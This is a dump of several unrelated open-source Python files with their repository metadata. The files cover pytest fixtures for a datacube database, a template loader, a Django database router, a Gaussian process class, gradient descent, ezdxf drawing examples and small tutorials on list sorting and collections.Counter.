DEA_PRODUCTS_DIR = digitalearthau.CONFIG_DIR / 'products'
def load_yaml_file(path):
with path.open() as f:
return list(yaml.load_all(f, Loader=SafeLoader))
@pytest.fixture
def integration_test_data(tmpdir):
d = tmpdir.join('integration_data')
shutil.copytree(str(INTEGRATION_TEST_DATA), str(d))
return Path(str(d))
@pytest.fixture
def dea_index(index: Index):
"""
An index initialised with DEA config (products)
"""
# Add DEA metadata types, products. They'll be validated etc.
for md_type_def in load_yaml_file(DEA_MD_TYPES):
index.metadata_types.add(index.metadata_types.from_doc(md_type_def))
for product_file in DEA_PRODUCTS_DIR.glob('*.yaml'):
for product_def in load_yaml_file(product_file):
index.products.add_document(product_def)
return index
@pytest.fixture
def datasets(dea_index):
# Add test datasets, collection definitions.
pass
@pytest.fixture
def integration_config_paths():
return (
str(INTEGRATION_DEFAULT_CONFIG_PATH),
os.path.expanduser('~/.datacube_integration.conf')
)
@pytest.fixture
def global_integration_cli_args(integration_config_paths):
"""
The first arguments to pass to a cli command for integration test configuration.
"""
# List of a config files in order.
return list(itertools.chain(*(('--config_file', f) for f in integration_config_paths)))
@pytest.fixture
def local_config(integration_config_paths):
return LocalConfig.find(integration_config_paths)
@pytest.fixture()
def db(local_config):
db = PostgresDb.from_config(local_config, application_name='dea-test-run', validate_connection=False)
# Drop and recreate tables so our tests have a clean db.
with db.connect() as connection:
_core.drop_db(connection._connection)
remove_dynamic_indexes()
# Disable informational messages since we're doing this on every test run.
with _increase_logging(_core._LOG) as _:
_core.ensure_db(db._engine)
# We don't need informational create/drop messages for every config change.
_dynamic._LOG.setLevel(logging.WARN)
yield db
db.close()
@contextmanager
def _increase_logging(log, level=logging.WARN):
previous_level = log.getEffectiveLevel()
log.setLevel(level)
yield
log.setLevel(previous_level)
def remove_dynamic_indexes():
"""
Clear any dynamically created indexes from the schema.
"""
# Our normal indexes start with "ix_", dynamic indexes with "dix_"
for table in _core.METADATA.tables.values():
table.indexes.intersection_update([i for i in table.indexes if not i.name.startswith('dix_')])
@pytest.fixture
def index(db):
"""
:type db: datacube.index.postgres._api.PostgresDb
"""
return Index(db)
|
[
"jez@stulk.com"
] |
jez@stulk.com
|
3035b1f0f246ca1584d7f6b2f6e66ffe09a73ff8
|
07f34b776ac30e0e5e431730826eba0b324c5ad6
|
/fleet/deploy/template_manager.py
|
b8cfdc6736c8d9fdebaaed15d5a81f4add8297d2
|
[
"MIT"
] |
permissive
|
chrismcguire/fleet-py
|
bc54bd3293fcf5f921149ea412fe80ae8a9201bf
|
be8fdfc09e70110a8169add6a682e19d46ef6252
|
refs/heads/master
| 2021-01-17T09:24:16.390100
| 2015-08-13T22:55:16
| 2015-08-13T22:55:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
__author__ = 'sukrit'
from pkg_resources import resource_string
BUNDLED_TEMPLATE_PREFIX = "bundled://"
RAW_TEMPLATE_PREFIX = "raw://"
def fetch_template(template_url):
if template_url.startswith('http://') or \
template_url.startswith('https://'):
pass
if template_url.startswith(BUNDLED_TEMPLATE_PREFIX) and \
len(template_url) > len(BUNDLED_TEMPLATE_PREFIX):
template_file = template_url[len(BUNDLED_TEMPLATE_PREFIX):] +\
".service"
template = resource_string(__name__, '../../templates/'+template_file)
return template
if template_url.startswith(RAW_TEMPLATE_PREFIX) and \
len(template_url) > len(RAW_TEMPLATE_PREFIX):
return template_url[len(RAW_TEMPLATE_PREFIX):]
def fetch_bundled_template_url(group='default', template_type='app'):
template_url = '{}{}-{}'.format(BUNDLED_TEMPLATE_PREFIX, group,
template_type)
return template_url
|
[
"sukrit007@gmail.com"
] |
sukrit007@gmail.com
|
b03a754744d2e92f98ee97643c8249fbd63105f3
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/core/db/sqlalchemy/__init__.py
|
a5540829307aa4983312efca38ece0cfeda969e1
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383
| 2018-04-27T09:28:25
| 2018-04-27T09:28:25
| 101,277,325
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
# This file is part of fossir.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# fossir is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# fossir is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with fossir; if not, see <http://www.gnu.org/licenses/>.
from .core import db
from .custom import *
|
[
"hodardhazwinayo@gmail.com"
] |
hodardhazwinayo@gmail.com
|
ae21bc2c5a6ff8248e3231bbae691421738545f1
|
0cb970785a746a30f9b44b3e5234157818688197
|
/listsFolder/sort.py
|
16f655fb2a7ec882998f946257dc9b5209e1ce96
|
[] |
no_license
|
charan2108/pythonprojectsNew
|
4255bbb81b6cf0d47c51c131ed93a0bb331a669c
|
b2f273d44937ec576daa0235d0d0326ff5149bf8
|
refs/heads/main
| 2023-05-03T16:55:33.242693
| 2021-05-26T11:18:17
| 2021-05-26T11:18:17
| 371,001,254
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 196
|
py
|
cars = ['ferrari', 'ford', 'benz', 'audi', 'lamb']
print(cars)
cars.sort()
print(cars)
#reverse
cars = ['ferrari', 'ford', 'benz', 'audi', 'lamb']
print(cars)
cars.sort(reverse=True)
print(cars)
|
[
"sumacharan.adabala@gmail.com"
] |
sumacharan.adabala@gmail.com
|
d134bb106b4a554dcd7baf533c2c404fd5273d94
|
cfc49e6e65ed37ddf297fc7dffacee8f905d6aa0
|
/modulo_counter.py
|
5717eeb441ff429c28ab838b66ead40db1c14c04
|
[] |
no_license
|
IfDougelseSa/cursoPython
|
c94cc1215643f272f935d5766e7a2b36025ddbe2
|
3f9ceb9701a514106d49b2144b7f2845416ed8ec
|
refs/heads/main
| 2023-06-12T16:51:29.413031
| 2021-07-07T00:20:53
| 2021-07-07T00:20:53
| 369,268,883
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,476
|
py
|
"""
Módulo Collections - Counter(Contador)
Collections -> High-performance Container datetypes
Counter -> Recebe um iterável como parâmetro e cria um objeto do tipo Collections Counter que é parecido
com um dicionário, contendo como chave o elemento da lista passado como parâmetro e como valor a quantidade
de ocorrẽncias desse elemento.
# Utilizando o counter
from collections import Counter
#Exemplo 1
#Podemos utilizar qualquer iterável, aqui usamos uma lista.
lista = [1, 1, 2, 2, 3, 3, 3, 1 ,1 ,1 ,2 ,2 ,4 ,4 ,4 , 5, 5, 3 , 55, 33, 66 , 55, 44, 33, 22, 2, 22, 33]
res = Counter(lista)
print(type(res))
print(res)
# Counter({1: 5, 2: 5, 3: 4, 4: 3, 33: 3, 5: 2, 55: 2, 22: 2, 66: 1, 44: 1})
# Veja que para cada elemento da lista, o Counter criou uma chave e colocou como valor a quantidade
# de ocorrências.
# Exemplo 2
print(Counter('Geek University'))
Counter({'e': 3, 'i': 2, 'G': 1, 'k': 1, ' ': 1, 'U': 1, 'n': 1, 'v': 1, 'r': 1, 's': 1, 't': 1, 'y': 1})
"""
from collections import Counter
# Exemplo 3
texto = """ Lorem Ipsum is simply dummy text of the printing and typesetting industry.
Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,
when an unknown printer took a galley of type and scrambled it to make a type specimen book"""
palavras = texto.split()
# print(palavras)
res = Counter(palavras)
print(res)
#Encontrado as 5 palavras com mais ocorrência no texto.
print(res.most_common(5))
|
[
"doug_ccortez@outlook.com"
] |
doug_ccortez@outlook.com
|
1c4c018ec89c29b3fc8cded55da8088b460dfabd
|
923a14dd594191d77e30465027ece8371f28a7a6
|
/web-serpng/code/serpng/routers.py
|
40ae10220712dfe584223b7dc6fce22c9e272418
|
[] |
no_license
|
alyago/django-web
|
3af7b3389df59104eaf5e50ed9cc2c3e730fed7f
|
da3073eec6d676dfe0164502b80d2a1c75e89575
|
refs/heads/master
| 2021-01-10T19:33:45.425520
| 2013-11-21T09:43:37
| 2013-11-21T09:43:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
# Copyright (c) 2012, Simply Hired, Inc. All rights reserved.
"""Database Router"""
class SHRouter(object):
def db_for_read(self, model, **hints):
if model.__module__.startswith("autocomplete.models"):
return 'autocomplete'
else:
None
class AllowSyncDBRouter(object):
def allow_syncdb(self, db, model):
if db == 'default' and model.__module__.startswith('django.contrib.sessions.models'):
return True
if db == 'resume' and (model.__module__.startswith("serpng.resume.models") or
model.__module__.startswith('south.')):
return True
return False
|
[
"oleg@simplyhired.com"
] |
oleg@simplyhired.com
|
7e332c7f55f2003b9937427a4820c249e496d06f
|
306555b6f10ce4d64caca22c4a291a5ac6337e07
|
/Gaussian_Process.py
|
a9ae6361738bc3536a29d8302b8fce228b8be27e
|
[] |
no_license
|
BerenMillidge/GPs
|
1b107a265bb77452d2bb9a4a0854ae1b398ae6b7
|
3a8824c7c39a48d827ff098556bc23406cc7faad
|
refs/heads/master
| 2022-03-27T10:58:32.282459
| 2017-09-28T15:02:39
| 2017-09-28T15:02:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
from __future__ import division
import numpy as np
from kernels import*
default_kernel = Kernel("exponential_kernel", [0.01])
class GP:
def __init__(self, dataprovider, kernel = default_kernel):
self.dataprovider = dataprovider
self.kernel = kernel
def one_d_prior(self,data_vector):
N = len(data_vector)
means = np.zeros(N)
cov = np.zeros([N,N])
for i in xrange(N):
for j in xrange(N):
cov[i][j] = self.kernel.calculate_kernel_value(data_vector[i], data_vector[j])
#draw from the distribution and return
return np.random.multivariate_normal(means,cov)
|
[
"noreply@github.com"
] |
BerenMillidge.noreply@github.com
|
acc8860470b0001df7b8ae5651c2f43957062c25
|
ab9b1505a9f57d28cb12b853f14c7d00d34c36c5
|
/cursopython/pythonteste/aula21ambiente02.py
|
99e2618b048a734f08e61eb2d64041cd1d63e1f6
|
[
"MIT"
] |
permissive
|
AtilaCosta87/Python
|
610a1170c8a043e09c3580f18a048181cfbc8348
|
b4eea7885d16df80feecc4c699a8348ca13a80c2
|
refs/heads/master
| 2022-05-27T04:24:40.469166
| 2020-04-25T02:08:23
| 2020-04-25T02:08:23
| 258,666,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
def soma(a=0, b=0, c=0):
"""
-> Faz a soma de três valores e mostra o resultado na tela.
:param a: O primeiro valor
:param b: O seguando valor
:param c: O terceiro valor
Função criada por Átila Costa na aula do canal CursoemVideo
"""
s = a + b + c
print(f'A soma vale {s}', end='')
#soma(3, 2, 5)
#soma(3, 2)
#soma(3)
#soma()
#soma(3, 3, 5, 8) -> vai dar erro, pois pode receber até 3 parametros
#soma(3, 3, 5)
#soma(b=4, c=2)
soma(c=3, a=2)
|
[
"atila_costa87@hotmail.com"
] |
atila_costa87@hotmail.com
|
6644c8aa6bde8b175f454eb1aa510bbe1314618c
|
cebc80d0d9dcdd0b2458f4d2105dcc489d2079ee
|
/setup.py
|
2d85325bff794a58bf51d88e285b8a390c7235ac
|
[] |
no_license
|
Gilles86/flogiston
|
1bd1fafc1a4a1efc5369293db34bcd0d4ce16582
|
62f27cdc4e740855c18139ff402face543bc5c92
|
refs/heads/master
| 2016-09-05T09:06:40.993535
| 2015-11-23T13:37:58
| 2015-11-23T13:37:58
| 29,321,422
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 767
|
py
|
#!/usr/bin/env python
#from distutils.core import setup
from setuptools import setup
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.add_subpackage('flogiston')
return config
def main():
from numpy.distutils.core import setup
setup(name='flogiston',
version='0.1',
description='Link fMRI data to cognitive models like the LBA model',
author='Gilles de Hollander',
author_email='gilles.de.hollander@gmail.com',
url='http://www.gillesdehollander.nl',
packages=['flogiston'],
configuration=configuration
)
if __name__ == '__main__':
main()
|
[
"Gilles.de.Hollander@gmail.com"
] |
Gilles.de.Hollander@gmail.com
|
5c3ec9b8bca633c0b13497f11002177fbd589d58
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_151/ch22_2020_09_09_18_55_45_398877.py
|
949d4f34161a93ae72b7f3993ee0a87fd3a1d540
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
def reduction(x, y):
f = round((365 * x * y * 10) / (60 * 24), 0)
return f
a = int(input('cigarros p/ dia '))
b = int(input('fuma a quantos anos '))
c = reduction(a, b)
print(c)
|
[
"you@example.com"
] |
you@example.com
|
128902adf28d2ffa058348060bc4cb5b09cddc8a
|
5eb97d15b975c3ef3de10401594f31c502e04de4
|
/YeNet-Tensorflow/testSRM.py
|
f04d18729452e84e6c517654c59ebc785251e5bd
|
[] |
no_license
|
coriverchen/Steganalysis
|
863f133f506afa9e8400d2c14acee833d942d51f
|
f7844698bff217ff206b9a3de15ccec708951c83
|
refs/heads/master
| 2022-03-30T10:25:30.118715
| 2019-11-29T04:21:59
| 2019-11-29T04:21:59
| 256,136,538
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 8 14:33:16 2019
@author: Lee
"""
import numpy as np
SRM_Kernels = np.load('SRM_Kernels.npy')
print(SRM_Kernels[:1])
|
[
"870407139@qq.com"
] |
870407139@qq.com
|
c48d547a02107433a9ba668d5a79b1c1374499e5
|
03f1a716d426dcb7b5d77b9050e6332ab0726a9f
|
/nn6/__init__.py
|
724f5c4d6039bd7f245d65cd0740ea1f63523eab
|
[
"MIT"
] |
permissive
|
brice291/nn6
|
8e8688179834dfea3bd8d1f453e1135bfb6c5e45
|
9c7ca32514aa121ad36504f0c11177d8989660ae
|
refs/heads/master
| 2022-04-03T02:00:13.599236
| 2019-12-02T09:20:16
| 2019-12-02T09:20:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 839
|
py
|
import numpy as np
from numpy.linalg import norm
# 函數 f 對變數 k 的偏微分: df / dk
def df(f, p, k, step=0.01):
p1 = p.copy()
p1[k] = p[k]+step
return (f(p1) - f(p)) / step
# 函數 f 在點 p 上的梯度
def grad(f, p, step=0.01):
gp = p.copy()
for k in range(len(p)):
gp[k] = df(f, p, k, step)
return gp
# 使用梯度下降法尋找函數最低點
def gd(f, p0, step=0.001):
p = p0.copy()
while (True):
gp = grad(f, p) # 計算梯度 gp
glen = norm(gp) # norm = 梯度的長度 (步伐大小)
print('p=', p, 'f(p)=', f(p), 'glen=', glen)
if glen < 0.00001: # 如果步伐已經很小了,那麼就停止吧!
break
# gstep = np.mul(gp, -1 * step) # gstep = 逆梯度方向的一小步
gstep = np.multiply(gp, -1*step)
p += gstep # 向 gstep 方向走一小步
return p # 傳回最低點!
|
[
"ccckmit@gmail.com"
] |
ccckmit@gmail.com
|
850ac07380673e3ec79b314d5c5c986d50092181
|
f0a44b63a385e1c0f1f5a15160b446c2a2ddd6fc
|
/examples/transform_ucs.py
|
ee0962d84cada4759f9a40046f14c79071c8b632
|
[
"MIT"
] |
permissive
|
triroakenshield/ezdxf
|
5652326710f2a24652605cdeae9dd6fc58e4f2eb
|
82e964a574bcb86febc677bd63f1626318f51caf
|
refs/heads/master
| 2023-08-17T12:17:02.583094
| 2021-10-09T08:23:36
| 2021-10-09T08:23:36
| 415,426,069
| 1
| 0
|
MIT
| 2021-10-09T21:31:25
| 2021-10-09T21:31:25
| null |
UTF-8
|
Python
| false
| false
| 4,940
|
py
|
# Copyright (c) 2020-2021 Manfred Moitzi
# License: MIT License
import pathlib
import math
import ezdxf
from ezdxf import zoom
from ezdxf.math import UCS, Vec3
OUTDIR = pathlib.Path("~/Desktop/Outbox").expanduser()
NARROW = "OpenSansCondensed-Light"
X_COUNT = 7
Y_COUNT = 7
DX = 2
DY = 2
def add_circle(msp, ucs):
msp.add_circle(
center=(0, 0),
radius=0.5,
dxfattribs={
"color": 6,
},
).transform(ucs.matrix)
def add_ocs_circle(msp, ucs):
msp.add_circle(
center=(0, 0, 0.5),
radius=0.25,
dxfattribs={
"color": 6,
"extrusion": (1, 0, 0),
},
).transform(ucs.matrix)
def add_ellipse(msp, ucs):
msp.add_ellipse(
center=(0, 0),
major_axis=(0.5, 0, 0),
ratio=0.5,
start_param=0,
end_param=math.pi,
dxfattribs={
"color": 1,
},
).transform(ucs.matrix)
def add_ocs_arc(msp, ucs):
msp.add_arc(
center=(0, 0, 0.5),
radius=0.25,
start_angle=0,
end_angle=90,
dxfattribs={
"color": 4,
"extrusion": (-1, 0, 0),
},
).transform(ucs.matrix)
def add_solid(msp, ucs):
msp.add_solid(
[(-0.25, -0.15), (0.25, -0.15), (0, -0.5)], dxfattribs={"color": 2}
).transform(ucs.matrix)
def add_trace(msp, ucs):
msp.add_trace(
[(-0.25, 0.15), (0.25, 0.15), (0, 0.5)], dxfattribs={"color": 7}
).transform(ucs.matrix)
def add_3dface(msp, ucs):
msp.add_3dface(
[(0, 0, 0), (0.5, 0.5, 0), (0.5, 0.5, 0.5), (0, 0, 0.5)],
dxfattribs={"color": 8},
).transform(ucs.matrix)
def add_lwpolyline(msp, ucs):
msp.add_lwpolyline(
[(0, 0, 0), (0.3, 0, 1), (0.3, 0.3, 0), (0, 0.3, 0)],
format="xyb",
dxfattribs={"color": 6},
).transform(ucs.matrix)
def add_text(msp, ucs):
msp.add_text(
"TEXT",
dxfattribs={
"color": 4,
"style": NARROW,
"height": 0.2,
},
).set_align("MIDDLE_CENTER").transform(ucs.matrix)
def add_mtext(msp, ucs):
# It is always better to use text_direction instead of a rotation angle,
# which works only for extrusion == (0, 0, 1)
msp.add_mtext(
"MTEXT",
dxfattribs={
"color": 5,
"style": NARROW,
"char_height": 0.2,
"insert": (0, 0),
"rotation": 90,
"attachment_point": 4,
},
).transform(ucs.matrix)
def scene1(filename):
doc = ezdxf.new("R2010", setup=True)
msp = doc.modelspace()
ucs = UCS()
angle = math.pi / 12 # 15 degree
for ix in range(X_COUNT):
for iy in range(Y_COUNT):
ucs.moveto((ix * DX, iy * DY, 0))
ucs.render_axis(msp, length=1)
add_circle(msp, ucs)
# add_ocs_circle(msp, ucs)
# add_ocs_arc(msp, ucs)
# add_text(msp, ucs)
add_mtext(msp, ucs)
add_ellipse(msp, ucs)
# add_solid(msp, ucs)
add_trace(msp, ucs)
# add_3dface(msp, ucs)
# add_lwpolyline(msp, ucs)
ucs = ucs.rotate_local_z(angle)
ucs = UCS().rotate_local_x(ix * angle)
zoom.extents(msp)
doc.saveas(filename)
def add_excentric_text(msp, ucs, location, text):
text = msp.add_mtext(
text,
dxfattribs={
"color": 5,
"style": NARROW,
"char_height": 0.2,
"insert": location,
"attachment_point": 5,
},
)
text.transform(ucs.matrix)
msp.add_line(
start=(0, 0, 0), end=(location.x, 0, 0), dxfattribs={"color": 1}
).transform(ucs.matrix)
msp.add_line(
start=(location.x, 0, 0),
end=(location.x, location.y, 0),
dxfattribs={"color": 3},
).transform(ucs.matrix)
msp.add_line(
start=(location.x, location.y, 0),
end=(location.x, location.y, location.z),
dxfattribs={"color": 5},
).transform(ucs.matrix)
def scene2(filename):
doc = ezdxf.new("R2010", setup=True)
msp = doc.modelspace()
delta = 6
for z in range(-2, 3):
for y in range(-2, 3):
for x in range(-2, 3):
cx = x * delta
cy = y * delta
cz = z * delta
ucs = (
UCS(origin=(cx, cy, cz))
.rotate_local_z(math.radians(45))
.rotate_local_x(math.radians(30))
)
add_excentric_text(
msp,
ucs,
location=Vec3(1, 2, 3),
text=f"Hallo\n(x={cx}, y={cy}, z={cz})",
)
zoom.extents(msp)
doc.saveas(filename)
if __name__ == "__main__":
scene1(OUTDIR / "transform_scene_1.dxf")
scene2(OUTDIR / "transform_scene_2.dxf")
|
[
"me@mozman.at"
] |
me@mozman.at
|
35d2c662fbb29329f46cc039d12df65fcc2e402e
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_337/ch78_2020_04_12_01_52_05_952994.py
|
618d2e41901705a68a61d1e4af17bec9060603e5
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 491
|
py
|
nome = input('Nome?')
atletas = {}
i = 0
while nome != 'sair':
a = float(input('aceleração?'))
atletas[nome] = a
nome = input('Nome?')
if i == 0:
vence = a
i+= 1
valores = atletas.values()
dic = {}
for i in valores:
tempo = (200/i)**(1/2)
for k in atletas.keys():
if atletas[k] == i:
dic[k] = tempo
valor = dic.values()
for e in valor:
if e < vence:
vence = e
for q in atletas:
if atletas[q] == e:
atleta = q
|
[
"you@example.com"
] |
you@example.com
|
6da4091fd8ac8ad313d1b7259bd84c569f0a6e08
|
920f0fbb7064f2017ff62da372eaf79ddcc9035b
|
/lc_ladder/company/amzn/oa/Search_A_2D_Matrix.py
|
617d0c9cea04baca4bd662f4ceb49c9887b4a548
|
[] |
no_license
|
JenZhen/LC
|
b29a1c45d8c905680c7b4ad0017516b3dca80cc4
|
85219de95e41551fce5af816b66643495fe51e01
|
refs/heads/master
| 2021-06-03T10:03:02.901376
| 2020-08-05T19:44:48
| 2020-08-05T19:44:48
| 104,683,578
| 3
| 1
| null | 2020-08-05T19:44:50
| 2017-09-24T23:30:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,980
|
py
|
#! /usr/local/bin/python3
# Requirement
# Example
# 写出一个高效的算法来搜索 m × n矩阵中的值。
#
# 这个矩阵具有以下特性:
#
# 每行中的整数从左到右是排序的。
# 每行的第一个数大于上一行的最后一个整数。
# 样例
# 考虑下列矩阵:
#
# [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# 给出 target = 3,返回 true
#
# 挑战
# O(log(n) + log(m)) 时间复杂度
"""
Algo: Binary Search
D.S.:
Solution:
Time: O(log(n) + log(m))
Corner cases:
"""
class Solution:
"""
@param matrix: matrix, a list of lists of integers
@param target: An integer
@return: a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
if not matrix or not matrix[0] or target is None:
return False
m, n = len(matrix), len(matrix[0])
# search which row target is
l, r = 0, m - 1
row, col = -1, -1
while l + 1 < r:
mid = l + (r - l) // 2
if matrix[mid][0] <= target <= matrix[mid][n - 1]:
row = mid
break
elif target < matrix[mid][0]:
r = mid - 1
else:
l = mid + 1
if matrix[l][0] <= target <= matrix[l][n - 1]:
row = l
if matrix[r][0] <= target <= matrix[r][n - 1]:
row = r
if row == -1:
return False
# serach which col target is
l, r = 0, n - 1
while l + 1 < r:
mid = l + (r - l) // 2
if matrix[row][mid] == target:
return True
elif target < matrix[row][mid]:
r = mid - 1
else:
l = mid + 1
if matrix[row][l] == target or matrix[row][r] == target:
return True
return False
# Test Cases
if __name__ == "__main__":
solution = Solution()
|
[
"jenzhen.nyc89@yahoo.com"
] |
jenzhen.nyc89@yahoo.com
|
8fccf7816b9470fb84f1a4004f158f26b3e9010d
|
fa165cdb86defd6d6131ac763c38d6875c4ebec8
|
/manage.py
|
e472a9b3db0e0dfb7893cce4f0d989c49fb87545
|
[] |
no_license
|
HongHanh120/generate-image-captcha
|
3f93665393eae0df41c2bafdb2e02a1d9dd29da4
|
144aae5fed9e15c670d8eda9501e53d7dc252256
|
refs/heads/main
| 2023-05-16T05:41:52.215234
| 2021-06-01T19:18:17
| 2021-06-01T19:18:17
| 354,935,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 672
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'generate_captcha.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"lehonghanh.120@gmail.com"
] |
lehonghanh.120@gmail.com
|
d7ca2662615309dffb8694f7333f7b13866cb74a
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1/kcrt/A.py
|
8a78979fdd4d2249fd6b2449edec65b0d5a74bda
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 371
|
py
|
# -*- coding: utf-8 -*-
T = int(input())
for t in range(T):
N = int(input())
if N == 0:
result = "INSOMNIA"
else:
n = 0
digits_seen = set()
while len(digits_seen) != 10:
n += N
for x in str(n):
digits_seen.add(x)
result = str(n)
print("Case #" + str(t + 1) + ": " + result)
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
497971334d48da8fa1c01f649fa7eedf0c06d2a2
|
b83ac23819fd7ba998563f2ad870405bdd07cc2b
|
/experiments/util/util.py
|
5911d151f027ca6f96b5121f25011c81af5f76ec
|
[
"MIT"
] |
permissive
|
Limmen/gym-idsgame
|
699abd2894bce15108f1606f5fb71f612dd7ba03
|
d10830fef55308d383c98b41b34688a7fceae357
|
refs/heads/master
| 2023-09-01T17:32:16.768138
| 2023-08-22T12:00:53
| 2023-08-22T12:00:53
| 247,794,752
| 49
| 12
|
MIT
| 2021-04-21T07:50:06
| 2020-03-16T19:00:27
|
Python
|
UTF-8
|
Python
| false
| false
| 3,889
|
py
|
"""
Utility functions for experiments with the idsgame-env
"""
import io
import json
import jsonpickle
import logging
import time
import argparse
import os
from gym_idsgame.config.client_config import ClientConfig
def create_artefact_dirs(output_dir: str, random_seed : int) -> None:
"""
Creates artefact directories if they do not already exist
:param output_dir: the base directory
:param random_seed: the random seed of the experiment
:return: None
"""
if not os.path.exists(output_dir + "/results/logs/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/logs/" + str(random_seed) + "/")
if not os.path.exists(output_dir + "/results/plots/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/plots/" + str(random_seed) + "/")
if not os.path.exists(output_dir + "/results/data/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/data/" + str(random_seed) + "/")
if not os.path.exists(output_dir + "/results/hyperparameters/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/hyperparameters/" + str(random_seed) + "/")
if not os.path.exists(output_dir + "/results/gifs/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/gifs/" + str(random_seed) + "/")
if not os.path.exists(output_dir + "/results/tensorboard/" + str(random_seed) + "/"):
os.makedirs(output_dir + "/results/tensorboard/" + str(random_seed) + "/")
def setup_logger(name: str, logdir: str, time_str = None):
"""
Configures the logger for writing log-data of experiments
:param name: name of the logger
:param logdir: directory to save log files
:param time_str: time string for file names
:return: None
"""
# create formatter
formatter = logging.Formatter('%(asctime)s,%(message)s')
# log to console
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
# log to file
if time_str is None:
time_str = str(time.time())
fh = logging.FileHandler(logdir + "/" + time_str + "_" + name + ".log", mode="w")
fh.setLevel(logging.INFO)
fh.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
#logger.addHandler(ch)
return logger
def write_config_file(config: ClientConfig, path: str) -> None:
"""
Writes a config object to a config file
:param config: the config to write
:param path: the path to write the file
:return: None
"""
json_str = json.dumps(json.loads(jsonpickle.encode(config)), indent=4, sort_keys=True)
with io.open(path, 'w', encoding='utf-8') as f:
f.write(json_str)
def read_config(config_path) -> ClientConfig:
"""
Reads configuration of the experiment from a json file
:param config_path: the path to the configuration file
:return: the configuration
"""
with io.open(config_path, 'r', encoding='utf-8') as f:
json_str = f.read()
client_config: ClientConfig = jsonpickle.decode(json_str)
return client_config
def parse_args(default_config_path):
"""
Parses the commandline arguments with argparse
:param default_config_path: default path to config file
"""
parser = argparse.ArgumentParser(description='Parse flags to configure the json parsing')
parser.add_argument("-cp", "--configpath", help="Path to configuration file",
default=default_config_path, type=str)
parser.add_argument("-po", "--plotonly", help="Boolean parameter, if true, only plot",
action="store_true")
parser.add_argument("-nc", "--noconfig", help="Boolean parameter, if true always override config",
action="store_true")
args = parser.parse_args()
return args
|
[
"kimham@kth.se"
] |
kimham@kth.se
|
c83e2817d9a860680a5a11fdeadfb2a9d45c9037
|
1793aac7856809ed8e121955056154de50a2ae8f
|
/c07_pycon_tw/p14_digit_stack.py
|
